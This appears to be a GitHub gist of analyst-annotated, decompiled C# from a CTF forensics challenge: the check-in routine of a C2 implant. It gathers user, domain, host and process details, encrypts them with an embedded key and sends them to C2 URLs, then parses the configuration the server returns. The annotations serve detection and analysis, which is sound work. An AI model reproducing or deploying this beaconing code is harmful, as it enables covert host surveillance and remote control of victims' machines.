@khr0x40sh
Created March 23, 2023 20:04
HTB:CA2023 Forensics Interstellar Primer C2 Function
// Program
// Token: 0x06000011 RID: 17 RVA: 0x000025C8 File Offset: 0x000007C8
/// <summary>
/// First-stage check-in routine recovered from the decompiled sample (analyst annotations added;
/// the code itself is unchanged decompiler output).
/// Collects basic host/user/process details, sends them encrypted to each base URL in
/// <c>Program.basearray</c> until one answers, decrypts the reply, extracts the marker-delimited
/// configuration fields from it and passes them to <c>Program.ImplantCore</c>.
/// </summary>
/// <remarks>
/// Analyst notes:
/// - The embedded key, the fixed URI path and the marker strings below are static values in the
///   binary, which makes them candidate signatures for file/memory scanning and proxy-log hunting.
/// - NOTE(review): the marker format (token + digits, then the same reversed) resembles the
///   open-source PoshC2 dropper; confirm against the framework source before attributing.
/// - Program.ihInteg, Program.GetWebRequest, Program.Encryption, Program.Decryption and
///   Program.ImplantCore are defined elsewhere in the sample and are not visible here.
/// </remarks>
/// <exception cref="Exception">Thrown (bare, without a message) when no base URL returned a non-empty decrypted reply.</exception>
private static void primer()
{
// Hard-coded date gate: the whole routine is skipped once local time (DateTime.Now) reaches 2025-01-01.
// Presumably an expiry for the implant; useful to know when detonating the sample in a sandbox.
if (DateTime.ParseExact("2025-01-01", "yyyy-MM-dd", CultureInfo.InvariantCulture) > DateTime.Now)
{
// Counter of failed base-URL attempts (incremented at the bottom of the loop). How it is used elsewhere is not visible here.
Program.dfs = 0;
string text = "";
try
{
// Preferred source of the account name; typically DOMAIN\user form.
text = WindowsIdentity.GetCurrent().Name;
}
catch
{
// Any failure falls back to the plain user name from the environment.
text = Environment.UserName;
}
// A trailing "*" is appended to the user name when ihInteg() returns true.
// NOTE(review): presumably flags an elevated / high-integrity process; confirm in ihInteg.
if (Program.ihInteg())
{
text += "*";
}
// Host survey values that end up in the check-in string.
string userDomainName = Environment.UserDomainName;
string environmentVariable = Environment.GetEnvironmentVariable("COMPUTERNAME");
string environmentVariable2 = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int id = Process.GetCurrentProcess().Id;
string processName = Process.GetCurrentProcess().ProcessName;
// The process working directory is moved to %windir%.
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
// text2 = decrypted server reply; text3 = the base URL of the current (or last) attempt.
string text2 = null;
string text3 = null;
foreach (string text4 in Program.basearray)
{
// Check-in record: domain;user;computer;arch;pid;process;1 (the trailing "1" is a constant).
// The value does not change between iterations; it is simply rebuilt each time.
string un = string.Format("{0};{1};{2};{3};{4};{5};1", new object[]
{
userDomainName,
text,
environmentVariable,
environmentVariable2,
id,
processName
});
// Hard-coded Base64 key (44 characters, i.e. 32 bytes once decoded, consistent with a 256-bit key).
// The cipher lives in Program.Encryption/Decryption, not shown here. Because the key ships in the
// binary, an analyst who recovers those routines can decrypt this stage's captured traffic offline.
string key = "DGCzi057IDmHvgTVE2gm60w8quqfpMD+o8qCBGpYItc=";
text3 = text4;
// Fixed request path and query string appended to every base URL: a stable network indicator.
string address = text3 + "/Kettie/Emmie/Anni?Theda=Merrilee?c";
try
{
// The encrypted check-in record is handed to GetWebRequest, which returns an object exposing
// DownloadString (WebClient-style). How the record is attached to the request is decided
// inside GetWebRequest, which is not visible here.
string enc = Program.GetWebRequest(Program.Encryption(key, un, false, null)).DownloadString(address);
// The reply is decrypted with the same embedded key; the first successful URL ends the loop.
text2 = Program.Decryption(key, enc);
break;
}
catch (Exception ex)
{
// Failures are only written to the console; the loop moves on to the next base URL.
Console.WriteLine(string.Format(" > Exception {0}", ex.Message));
}
Program.dfs++;
}
// No usable reply from any base URL: abort with a bare Exception (handling by the caller is not shown).
if (string.IsNullOrEmpty(text2))
{
throw new Exception();
}
// Configuration extraction. Each field is wrapped in a start marker and its reverse as end marker.
// Match.Success is never checked, so a missing field yields an empty string from Groups[1].
// "(.*)" is greedy and, without RegexOptions.Singleline, does not cross newlines.
Regex regex = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
Match match = regex.Match(text2);
string randomURI = match.Groups[1].ToString();
regex = new Regex("URLS10484390243(.*)34209348401SLRU");
match = regex.Match(text2);
string stringURLS = match.Groups[1].ToString();
regex = new Regex("KILLDATE1665(.*)5661ETADLLIK");
match = regex.Match(text2);
string killDate = match.Groups[1].ToString();
regex = new Regex("SLEEP98001(.*)10089PEELS");
match = regex.Match(text2);
string sleep = match.Groups[1].ToString();
regex = new Regex("JITTER2025(.*)5202RETTIJ");
match = regex.Match(text2);
string jitter = match.Groups[1].ToString();
// Replacement key delivered by the server and passed on to ImplantCore.
// NOTE(review): presumably used for later traffic instead of the embedded key; confirm in ImplantCore.
regex = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
match = regex.Match(text2);
string key2 = match.Groups[1].ToString();
regex = new Regex("IMGS19459394(.*)49395491SGMI");
match = regex.Match(text2);
string stringIMGS = match.Groups[1].ToString();
// Hand-off to the main routine with the base URL that answered and the extracted settings.
// Argument order differs from extraction order: key2 precedes stringIMGS and jitter comes last.
Program.ImplantCore(text3, randomURI, stringURLS, killDate, sleep, key2, stringIMGS, jitter);
}
}